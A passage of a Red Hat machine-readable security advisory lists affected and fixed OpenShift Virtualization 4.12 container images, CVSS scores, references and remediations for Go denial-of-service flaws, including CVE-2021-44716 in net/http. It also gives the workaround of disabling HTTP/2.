"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: out-of-bounds read in golang.org/x/text/language leads to DoS"
},
{
"cve": "CVE-2021-44716",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-09T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030801"
}
],
"notes": [
{
"category": "description",
"text": "There\u0027s an uncontrolled resource consumption flaw in golang\u0027s net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http\u0027s http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/http: limit growth of header canonicalization cache",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44716"
},
{
"category": "external",
"summary": "RHBZ#2030801",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030801"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44716",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44716"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k",
"url": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k"
}
],
"release_date": "2021-12-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
]
}
],
